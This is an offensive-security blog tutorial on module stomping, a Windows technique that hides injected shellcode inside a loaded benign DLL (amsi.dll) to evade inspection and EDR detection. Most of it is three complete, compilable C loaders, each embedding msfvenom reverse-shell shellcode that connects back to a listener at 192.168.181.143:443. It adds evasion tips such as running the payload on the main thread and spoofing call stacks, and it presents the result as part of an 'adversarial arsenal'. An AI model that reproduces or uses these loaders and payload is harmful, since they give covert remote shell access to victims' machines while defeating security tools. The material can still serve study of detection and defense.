Tradecraft Improvement 2 - Module Stomping

Introduction

In the second installment of the tradecraft improvement series, we will discuss a very common technique used when running or injecting shellcode in memory. Most of the time, when we inject shellcode directly into the memory of the current process or a remote process, it shows up as an unbacked memory region. That means there is no file on disk that this memory originates from. This will raise suspicion if the memory used by the thread is inspected.

There are many techniques available to solve this problem. One of the most common is Module Stomping. In this technique the attacker loads a benign DLL into the current process or a remote process and writes the shellcode into the memory of that DLL. As a result, when the shellcode is executed, it appears to originate from the loaded benign DLL.

Steps Required to use Module Stomping

  1. First we load a benign DLL from the disk
  2. We get the address of the DLL in memory (the code below uses the base address returned by LoadLibraryA)
  3. Using that address, we choose an arbitrary location inside the DLL where we will write our shellcode
  4. Make sure that the DLL is large enough to hold our shellcode
  5. Execute the shellcode inside the DLL by either creating a new thread or directly executing the shellcode from the pointer
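
Step 4 comes down to a bounds check. The following is a minimal sketch of that check, not part of the original code: the function name `payload_fits` and its three parameters are assumptions made for illustration, and in practice the region size would have to be read from the module's headers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Returns true when the byte range [offset, offset + payload_size) lies
 * entirely inside a region of region_size bytes. */
bool payload_fits(size_t region_size, size_t offset, size_t payload_size)
{
    if (offset > region_size) {
        return false; /* the start is already past the end of the region */
    }
    /* Compare against the space left after offset rather than computing
     * offset + payload_size, which could wrap around for huge values. */
    return payload_size <= region_size - offset;
}

/* Usage with made-up numbers (none of them describe a real DLL). */
void payload_fits_example(void)
{
    assert(payload_fits(0x10000, 0x2000, 512));  /* plenty of room */
    assert(!payload_fits(0x2000, 0x1F00, 512));  /* runs off the end */
}
```

Comparing against the remaining space avoids an overflow in `offset + payload_size`, which matters little for small payloads but keeps the check correct for any input.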

Checking a normal in-memory shellcode runner

First we will look at what happens when we inject shellcode directly into the memory of the process.

For this test we will use a normal shellcode injection program.

#include <stdio.h>
#include <windows.h>
#include <stdlib.h>

typedef LPVOID (WINAPI *VirtualAlloc_t)(
   LPVOID lpAddress,
   SIZE_T dwSize,
   DWORD  flAllocationType,
   DWORD  flProtect
);

typedef HANDLE (WINAPI *CreateThread_t)(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);

//msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.181.143 LPORT=443 -f c EXITFUNC=thread
unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";

size_t payloadsize = sizeof(shellcode);

int main()
{
	VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
	CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");

	LPVOID ptr = VirtualAlloc_p(NULL, payloadsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	memcpy(ptr, shellcode, payloadsize);

	//pause to inspect

	getchar();
	HANDLE hThread = CreateThread_p(0, 0, (LPTHREAD_START_ROUTINE)ptr, NULL, 0, 0);

	if (hThread == NULL)
	{
		printf("Error Creating thread\n");
		return -1;
	}
	printf("Thread Created\n");
	getchar();

	WaitForSingleObject(hThread, INFINITE);
	return 0;
}
  • This is a normal shellcode injection which allocates an RWX memory region and then copies the shellcode into that memory region

  • Then it starts a new thread to execute the shellcode

  • Compile this code and run it

  • This shellcode will spawn a reverse shell on our netcat listener

  • Once the code pauses, inspect it using Process Hacker

  • Once the thread is created, inspect the process again

  • We will see a strange address in the call stack of the thread, which is not backed by any module

  • Inspecting this strange memory address further, we will find our shellcode loaded in an RWX memory region

  • Now our aim is to make sure that the origin of the shellcode looks as if it is from a legit module
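
To make the idea of an unbacked region concrete, here is a rough sketch of the kind of check an inspection tool could apply to each memory region. It is an illustration under assumptions, not how Process Hacker is implemented: `struct region_info` is a hypothetical, trimmed-down stand-in for the `Type` and `Protect` fields of `MEMORY_BASIC_INFORMATION`, and the constants are redefined under made-up `SKETCH_` names (with the same values as the Windows `MEM_*` and `PAGE_*` constants) so the example builds without `<windows.h>`.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Same values as the Windows MEM_* and PAGE_* constants, under made-up names. */
#define SKETCH_MEM_PRIVATE            0x20000u
#define SKETCH_MEM_IMAGE              0x1000000u
#define SKETCH_PAGE_READWRITE         0x04u
#define SKETCH_PAGE_EXECUTE           0x10u
#define SKETCH_PAGE_EXECUTE_READ      0x20u
#define SKETCH_PAGE_EXECUTE_READWRITE 0x40u
#define SKETCH_PAGE_EXECUTE_WRITECOPY 0x80u

/* Hypothetical stand-in for the two fields of interest. */
struct region_info {
    uint32_t type;    /* private, mapped or image */
    uint32_t protect; /* page protection flags */
};

/* True when any of the executable protection bits is set. */
bool is_executable(const struct region_info *r)
{
    const uint32_t exec_mask = SKETCH_PAGE_EXECUTE | SKETCH_PAGE_EXECUTE_READ |
                               SKETCH_PAGE_EXECUTE_READWRITE |
                               SKETCH_PAGE_EXECUTE_WRITECOPY;
    return (r->protect & exec_mask) != 0;
}

/* Executable private memory has no file behind it, which is what makes the
 * region allocated by the runner above stand out. */
bool is_unbacked_executable(const struct region_info *r)
{
    return is_executable(r) && r->type == SKETCH_MEM_PRIVATE;
}

/* Usage: the RWX allocation is flagged, a module's code section is not. */
void region_example(void)
{
    struct region_info alloc = { SKETCH_MEM_PRIVATE, SKETCH_PAGE_EXECUTE_READWRITE };
    struct region_info image = { SKETCH_MEM_IMAGE, SKETCH_PAGE_EXECUTE_READ };
    assert(is_unbacked_executable(&alloc));
    assert(!is_unbacked_executable(&image));
}
```

Under this simplified rule, code running from inside a loaded DLL is reported as image-backed, which is the property module stomping relies on.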

Implementing Module Stomping

The following code implements module stomping.

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

typedef LPVOID (WINAPI *VirtualAlloc_t)(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);

typedef BOOL (WINAPI *VirtualProtect_t)(
 LPVOID lpAddress,
 SIZE_T dwSize,
 DWORD  flNewProtect,
 PDWORD lpflOldProtect
);

typedef HANDLE (WINAPI *CreateThread_t)(
 LPSECURITY_ATTRIBUTES   lpThreadAttributes,
 SIZE_T                  dwStackSize,
 LPTHREAD_START_ROUTINE  lpStartAddress,
 __drv_aliasesMem LPVOID lpParameter,
 DWORD                   dwCreationFlags,
 LPDWORD                 lpThreadId
);

unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";

size_t payloadsize = sizeof(shellcode);

int main()
{
  VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
  VirtualProtect_t VirtualProtect_p = (VirtualProtect_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect");
  CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");

  //Load the library to inject code into
  HMODULE lib = LoadLibraryA("C:\\Windows\\System32\\amsi.dll");

  printf("Address of library : %p\n", lib);
  SetLastError(0);

  if (lib != NULL)
  {
    //Finding a location inside the DLL to write the shellcode to
    PDWORD libPtr = lib + 2*4096;
    printf("Address : %p\n", libPtr);
    DWORD temp = 0;

    //Change memory protection before writing the shellcode    

    VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
    memcpy(libPtr, shellcode, payloadsize);

    //adjust the protection as before
    VirtualProtect_p(libPtr, payloadsize , temp,&temp);
    
    
    //start a new thread
    HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
    if(hThread == NULL)
    {
      printf("Thread not created\n");
    }
  }
  printf("Attach here\n");
  getchar();
  return 0;
}
  • In order to implement module stomping, we first need to find a DLL that is large enough to hold our shellcode and looks benign at the same time.

  • For this reason I have decided to use amsi.dll (I got the idea from ired.team)

  • The DLL is loaded using LoadLibraryA

  • Next we select a region inside the module where we can easily write our shellcode

PDWORD libPtr = lib + 2*4096;
  • Then adjust the memory permissions to PAGE_READWRITE so that we are able to copy our shellcode there
VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
  • Use memcpy to copy the shellcode to the selected memory region inside the module
memcpy(libPtr, shellcode, payloadsize);
  • Once the shellcode is copied, restore the original permissions of that memory region (the second VirtualProtect call passes back the old protection that was saved in temp)

  • Now use the CreateThread API to execute the shellcode in a new thread

  • The start location of the new thread should be the selected location inside the module

HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
  • This will give us a reverse shell on our listener
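
One detail of `lib + 2*4096` is worth spelling out: C scales pointer arithmetic by the size of the pointed-to type. Depending on how the headers define `HMODULE` (under `STRICT` it is typically a pointer to a small struct), the byte distance actually added may be larger than 2*4096. The sketch below shows the effect with a hypothetical `struct fake_handle` standing in for such a handle type; the names and the small array sizes are assumptions made for illustration only.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for a handle declared as a pointer to a small struct. */
struct fake_handle { int unused; };

/* Byte distance covered by base + n when base is a struct pointer. */
size_t struct_step_bytes(size_t n)
{
    static struct fake_handle pool[8];
    assert(n <= 8); /* stay within (or one past) the array */
    struct fake_handle *base = pool;
    return (size_t)((unsigned char *)(base + n) - (unsigned char *)base);
}

/* Byte distance covered by base + n when base is a byte pointer. */
size_t byte_step_bytes(size_t n)
{
    static unsigned char pool[8];
    assert(n <= 8);
    unsigned char *base = pool;
    return (size_t)((base + n) - base);
}
```

Here `struct_step_bytes(2)` yields `2 * sizeof(struct fake_handle)` while `byte_step_bytes(2)` yields 2. Casting the base to `unsigned char *` before adding the offset is one way to make sure an offset is counted in bytes.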

Executing the payload

  • Compile and run the code, then attach to it using x64Dbg

  • Go to the memory region that is displayed by the program

  • We will find our shellcode in that memory region
  • Now checking Process Hacker we will find that there is a new thread originating from amsi.dll

  • This can be confirmed if we follow the memory map in x64Dbg

  • We will see that this memory address is inside the amsi.dll

  • We will also get our reverse shell on our listener

A few areas for improvement

Even though this technique works just fine, we can still improve upon it.

Executing the shellcode in the main thread

  • You must have noticed that we use the CreateThread API to create a new thread in order to execute the shellcode
  • The creation of this new thread might be covered by the detection rules of the EDR system in use
  • A subtle change that solves this is to use a function pointer.
void (*run)() = (void (*)()) libPtr; run();
  • Here we create a pointer to a function that takes no arguments. This function points to the start address of the shellcode
  • Then we call that function to execute the shellcode
  • Doing so will result in executing the shellcode in the main thread instead of a new thread being created

Our final code should look as follows

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

typedef LPVOID (WINAPI *VirtualAlloc_t)(
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);

typedef BOOL (WINAPI *VirtualProtect_t)(
 LPVOID lpAddress,
 SIZE_T dwSize,
 DWORD  flNewProtect,
 PDWORD lpflOldProtect
);

typedef HANDLE (WINAPI *CreateThread_t)(
 LPSECURITY_ATTRIBUTES   lpThreadAttributes,
 SIZE_T                  dwStackSize,
 LPTHREAD_START_ROUTINE  lpStartAddress,
 __drv_aliasesMem LPVOID lpParameter,
 DWORD                   dwCreationFlags,
 LPDWORD                 lpThreadId
);

unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\xc0\xa8\xb5\x8f\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";

size_t payloadsize = sizeof(shellcode);

int main()
{
  VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
  VirtualProtect_t VirtualProtect_p = (VirtualProtect_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect");
  CreateThread_t CreateThread_p = (CreateThread_t)GetProcAddress(GetModuleHandle("kernel32.dll"), "CreateThread");

  //Load the library to inject code into
  HMODULE lib = LoadLibraryA("C:\\Windows\\System32\\amsi.dll");

  printf("Address of library : %p\n", lib);
  SetLastError(0);

  if (lib != NULL)
  {
    //Finding a location inside the DLL to write the shellcode to
    PDWORD libPtr = lib + 2*4096;
    printf("Address : %p\n", libPtr);
    DWORD temp = 0;

    //Change memory protection before writing the shellcode    

    VirtualProtect_p(libPtr, payloadsize , PAGE_READWRITE, &temp);
    memcpy(libPtr, shellcode, payloadsize);

    //adjust the protection as before
    VirtualProtect_p(libPtr, payloadsize , temp,&temp);
    
    
    //thread creation is commented out; the shellcode is called directly below
	/*
    HANDLE hThread = CreateThread_p(0, payloadsize, (LPTHREAD_START_ROUTINE)libPtr, NULL, 0, 0);
    if(hThread == NULL)
    {
      printf("Thread not created\n");
    }
	*/
    void (*run)() = (void (*)()) libPtr; run();
  }
  printf("Attach here\n");
  getchar();
  return 0;
}
  • Compile and run the code

  • Here we will see that no new thread is created; instead, the call stack of the main thread now contains an address inside amsi.dll

  • This is where the shellcode is being executed from

  • The main drawback of this approach is that, since the shellcode runs on the main thread, our main process will also stop if the shellcode exits

  • If the main thread is killed for some reason, the payload will become a zombie process

Complete Thread Stack Spoofing

  • In case of module stomping we are just loading a new module from the disk and writing our shellcode to its memory
  • This might raise some alerts and can be fingerprinted
  • To solve this, one can rewrite the call stack of the thread so that the entries pointing into unbacked memory regions look legitimate.
  • If implemented properly without any errors this can be difficult to catch.

Hunting for code caves inside DLLs

  • If the shellcode is very large, one needs to look for appropriate locations inside the DLL to write the shellcode to
  • Also one needs to check that the loaded DLL is large enough to accommodate the shellcode
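
As a rough illustration of what looking for an appropriate location can mean, the sketch below scans a byte buffer for the longest run of a given fill byte (padding between functions is often a repeated byte). It works on an ordinary buffer and knows nothing about PE sections; the names `byte_run` and `longest_run` are assumptions made for this example.

```c
#include <assert.h>
#include <stddef.h>

/* Position and size of a run of identical bytes. */
struct byte_run {
    size_t offset;
    size_t length;
};

/* Returns the first longest run of `fill` bytes in buf[0..len).
 * A length of 0 means the fill byte does not occur at all. */
struct byte_run longest_run(const unsigned char *buf, size_t len, unsigned char fill)
{
    struct byte_run best = { 0, 0 };
    size_t i = 0;
    while (i < len) {
        if (buf[i] != fill) {
            i++;
            continue;
        }
        size_t start = i;
        while (i < len && buf[i] == fill) {
            i++; /* extend the current run */
        }
        if (i - start > best.length) {
            best.offset = start;
            best.length = i - start;
        }
    }
    return best;
}

/* Usage on a small made-up buffer. */
void longest_run_example(void)
{
    const unsigned char sample[] = { 1, 0, 0, 2, 0, 0, 0, 3 };
    struct byte_run r = longest_run(sample, sizeof sample, 0);
    assert(r.offset == 4 && r.length == 3);
}
```

The returned length can then be compared with the payload size to decide whether the shellcode fits in that location.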

Conclusions

This was an introduction to basic module stomping. There are many improvements that can be made to this technique. It is a great technique to add to one's adversarial arsenal for use against security solutions.

Check out my source code for this part: https://github.com/dosxuz/TradecraftImrprovement/tree/main/Part-2

References

  1. https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection
  2. https://medium.com/@Breadman602/breadman-module-stomping-api-unhooking-using-native-apis-b10df89cc0a2